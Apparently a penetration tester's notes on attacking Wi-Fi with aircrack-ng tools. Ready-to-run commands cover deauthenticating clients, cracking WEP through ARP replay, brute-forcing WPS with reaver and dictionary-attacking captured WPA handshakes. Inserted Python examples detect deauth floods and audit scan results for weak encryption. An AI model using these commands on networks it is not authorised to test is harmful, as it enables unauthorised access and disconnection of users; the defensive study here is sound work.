Wireless

airodump-ng

Scanning

  • adapter must be in monitor mode

    • ifconfig wlan0 down

    • sometimes need airmon-ng check kill (stops the processes that would flip the card back to managed mode)

    • iwconfig wlan0 mode monitor

    • ifconfig wlan0 up

  • to sniff 5 GHz, use --band abg (or whichever specific band you are looking for)

  • airodump-ng --band abg mon0 (mon0 is new interface name for monitor mode adapter)

  • --bssid [BSSID]

  • --channel [channel]

  • --write [filename]

Deauthentication

  • disconnect a client from the network

  • aireplay-ng --deauth [# of packets (use a large number if you just want to keep the client disconnected)] -a [AP MAC address] -c [victim MAC address] mon0

  • airodump-ng may need to be running at the time the command is executed
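The deauth attack above works because 802.11 management frames carry no authentication unless 802.11w Protected Management Frames (PMF, mandatory in WPA3) are enabled, so a frame can claim to come from the AP. From the defender's side it is noisy: a burst of deauth/disassoc frames all with the same claimed source. The Python below is an added example, not part of these notes: it decodes the frame-control field and addresses of raw management frames and flags bursts with a sliding window. The sample frames and MAC addresses are constructed. The alert names the claimed source, which is the impersonated AP rather than the attacker; only PMF lets clients reject the spoofed disconnects outright.

```python
"""Spot deauthentication/disassociation floods in a stream of raw 802.11 frames.

Added example, not from the original notes. The sample frames below are
constructed; the MAC addresses are locally administered placeholders.
"""
from collections import defaultdict

# Frame Control, first byte: bits 0-1 version, bits 2-3 type, bits 4-7 subtype.
TYPE_MGMT = 0
SUBTYPE_DISASSOC = 0xA
SUBTYPE_DEAUTH = 0xC


def frame_kind(frame: bytes):
    """Return (type, subtype) decoded from the frame control field."""
    fc = frame[0]
    return (fc >> 2) & 0x3, (fc >> 4) & 0xF


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_disconnect(frame: bytes):
    """Return addresses and reason code of a deauth/disassoc frame, else None.

    Management header: FC(2) Duration(2) Addr1/DA(6) Addr2/SA(6) Addr3/BSSID(6)
    SeqCtl(2); the deauth/disassoc body starts with a 2-byte little-endian reason.
    """
    if len(frame) < 26:
        return None
    ftype, subtype = frame_kind(frame)
    if ftype != TYPE_MGMT or subtype not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        return None
    return {
        "kind": "deauth" if subtype == SUBTYPE_DEAUTH else "disassoc",
        "dst": mac_str(frame[4:10]),
        "src": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "seq": int.from_bytes(frame[22:24], "little") >> 4,
        "reason": int.from_bytes(frame[24:26], "little"),
    }


def detect_floods(records, window_s=1.0, threshold=10):
    """records: iterable of (timestamp_seconds, raw_frame).

    Returns [(claimed_source, bssid, peak_count)] for every (source, BSSID) pair
    that sent >= threshold disconnect frames inside some window_s-second window.
    """
    times_by_pair = defaultdict(list)
    for ts, frame in records:
        info = parse_disconnect(frame)
        if info:
            times_by_pair[(info["src"], info["bssid"])].append(ts)
    alerts = []
    for (src, bssid), times in times_by_pair.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window_s:  # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append((src, bssid, peak))
    return alerts


# Constructed sample frames (hex). AP = 02:00:00:00:aa:01, client = 02:00:00:00:cc:02.
AP, CLIENT = "02000000aa01", "02000000cc02"
# Beacon: first byte 0x80 (type 0, subtype 8), broadcast DA,
# body = timestamp(8) + beacon interval(2) + capabilities(2).
SAMPLE_BEACON = bytes.fromhex("80000000" + "ffffffffffff" + AP + AP + "0000"
                              + "0000000000000000" + "6400" + "1104")
# Data frame client -> AP: first byte 0x08 (type 2), flags 0x01 (To-DS), dummy payload.
SAMPLE_DATA = bytes.fromhex("08013a01" + AP + CLIENT + AP + "1000" + "aaaa0300")
# Deauth claiming to come from the AP, reason 7 (class 3 frame from non-associated STA).
SAMPLE_DEAUTH = bytes.fromhex("c0003a01" + CLIENT + AP + AP + "2000" + "0700")
# The client's own deauth when it leaves normally, reason 3 (STA is leaving).
SAMPLE_CLIENT_LEAVE = bytes.fromhex("c0003a01" + AP + CLIENT + AP + "3000" + "0300")

SAMPLE_RECORDS = (
    [(0.0, SAMPLE_BEACON), (0.5, SAMPLE_DATA), (0.9, SAMPLE_DATA)]
    + [(1.0 + i * 0.02, SAMPLE_DEAUTH) for i in range(15)]  # 15 deauths in 0.3 s
    + [(5.0, SAMPLE_CLIENT_LEAVE), (9.0, SAMPLE_CLIENT_LEAVE)]  # sparse, benign
)

if __name__ == "__main__":
    for src, bssid, n in detect_floods(SAMPLE_RECORDS):
        print(f"deauth flood: {n} frames claiming source {src} on BSSID {bssid}")
```

The window and threshold are starting points; a busy office AP legitimately emits a few disconnects a minute, while the pattern worth alerting on is dozens per second aimed at one client or broadcast. Sequence numbers (`seq`) that jump relative to the AP's real beacons are a second signal that the frames are forged.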

WEP

  • run a specific airodump scan

  • Need a high number of Data packets (IVs) to easily crack the key. Busier networks mean more data packets

    • if we don't have much traffic on the network, we can use fake auth packets to force the AP to generate IVs

    • associate to the network

      • aireplay-ng --fakeauth 0 -a [AP BSSID] -h [my mac address] mon0

    • arp replay

      • aireplay-ng --arpreplay -b [AP BSSID] -h [my mac address] mon0

      • wait for packets to fly

  • aircrack-ng [filename].cap

  • the recovered key can be entered either as ASCII or as the hex key with the colons removed to connect to the network

WPA/WPA2

  • WPS

    • discover WPS enabled devices

      • wash --interface mon0

    • brute with reaver

      • reaver --bssid [AP mac address] --channel [network channel] --interface mon0 -vvv --no-associate

      • if reaver fails with a send_packet error, revert to an older version of reaver

    • associate to network

      • aireplay-ng --fakeauth 30 -a [AP BSSID] -h [my mac address] mon0

        • the 30 is the delay in seconds between association attempts, kept long so the AP doesn't lock us out

  • Standard

    • run a specific airodump scan

    • wait for the handshake to be captured, or use a short deauth attack (send 4 deauth packets) so the client reconnects

    • run a dictionary attack against the file containing the handshake

      • aircrack-ng [filename].cap -w [wordlist]
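The same airodump-ng scan is how a defender inventories their own airspace, and the WEP and WPA sections above say what to look for: WEP keys fall to collected IVs, open networks encrypt nothing, and WPA/TKIP-only is deprecated. The script below is an added example, not part of these notes: it reads the AP table from an airodump-ng `--write` CSV and flags those networks. The column layout is assumed from airodump-ng's own CSV output, and the sample rows, BSSIDs and ESSIDs are constructed.

```python
"""Audit the AP table of an airodump-ng style CSV for weak link-layer security.

Added example, not from the original notes. Column names follow airodump-ng's
--write CSV output (assumption); the rows below are constructed sample data.
"""
import csv
import io

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:AA:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP, WEP, , -40,  500,  12000,   0.  0.  0.  0,   7, legacy1, 
02:00:00:00:AA:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 130, WPA2, CCMP, PSK, -55,  300,      0,   0.  0.  0.  0,   6, office, 
02:00:00:00:AA:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 36, 866, OPN, , , -60,  100,      0,   0.  0.  0.  0,   5, guest, 
02:00:00:00:AA:04, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, WPA, TKIP, PSK, -70,   50,      0,   0.  0.  0.  0,   6, oldap1, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:CC:02, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -50, 40, 02:00:00:00:AA:01, legacy1
"""


def parse_ap_section(text: str):
    """Return the AP rows as dicts; the station table after the blank line is ignored."""
    ap_text = text.split("\n\n")[0]
    # skipinitialspace drops the padding airodump-ng puts after each comma
    return list(csv.DictReader(io.StringIO(ap_text), skipinitialspace=True))


def classify(row: dict):
    """Return a finding string for a weak network, or None if nothing to flag."""
    privacy = row["Privacy"].split()  # e.g. ["WPA2"], ["WPA2", "WPA"], ["WEP"], ["OPN"]
    if "OPN" in privacy:
        return "open network: traffic is unencrypted on the air"
    if "WEP" in privacy:
        ivs = row["# IV"].strip()
        return (f"WEP: key recoverable from collected IVs ({ivs} seen so far); "
                "retire it or migrate to WPA2/WPA3")
    if "WPA" in privacy and not any(p in privacy for p in ("WPA2", "WPA3")):
        return "WPA/TKIP only: deprecated cipher suite; enable WPA2-CCMP or WPA3"
    return None


def audit(text: str):
    """Return [(bssid, essid, finding)] for every AP row that classify() flags."""
    findings = []
    for row in parse_ap_section(text):
        issue = classify(row)
        if issue:
            findings.append((row["BSSID"].strip(), row["ESSID"].strip(), issue))
    return findings


if __name__ == "__main__":
    for bssid, essid, issue in audit(SAMPLE_CSV):
        print(f"{bssid} '{essid}': {issue}")
```

Point it at the `.csv` that `airodump-ng --write` produces alongside the `.cap`; a WEP row with a climbing `# IV` count is the one the notes above describe as easy to crack, so it is the one to retire first.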
